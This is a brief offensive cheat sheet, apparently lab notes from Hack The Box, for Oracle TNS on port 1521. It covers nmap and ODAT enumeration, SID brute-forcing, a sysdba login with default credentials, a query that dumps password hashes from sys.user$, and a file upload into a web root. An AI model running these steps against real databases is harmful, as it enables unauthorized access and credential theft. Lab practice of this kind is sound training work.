[1521] Oracle TNS
#Enumerate the service
Intrusionz3r0X@htb[/htb]$ sudo nmap -p1521 -sV 10.129.204.235 --open
# Enumerate the service with ODAT (runs all of its modules)
Intrusionz3r0X@htb[/htb]$ ./odat.py all -s 10.129.204.235
# Nmap - SID Bruteforcing
Intrusionz3r0X@htb[/htb]$ sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
#Interact with Oracle service.
Intrusionz3r0X@htb[/htb]$ sqlplus scott/tiger@10.129.204.235/XE as sysdba
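# SQL run inside the sqlplus session: list tables, show the current user's role grants, and read account names and password hashes from sys.user$ (the last query needs SYS-level privileges)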
select table_name from all_tables;
select * from user_role_privs;
select name, password from sys.user$;
#File Upload
Intrusionz3r0X@htb[/htb]$ echo "Oracle File Upload Test" > testing.txt
Intrusionz3r0X@htb[/htb]$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
# Default web root by OS
# OS      | Path
# Linux   | /var/www/html
# Windows | C:\inetpub\wwwroot
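# Client setup (if sqlplus cannot find its shared libraries): register the Oracle Instant Client lib directory with the dynamic linker
Intrusionz3r0X@htb[/htb]$ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig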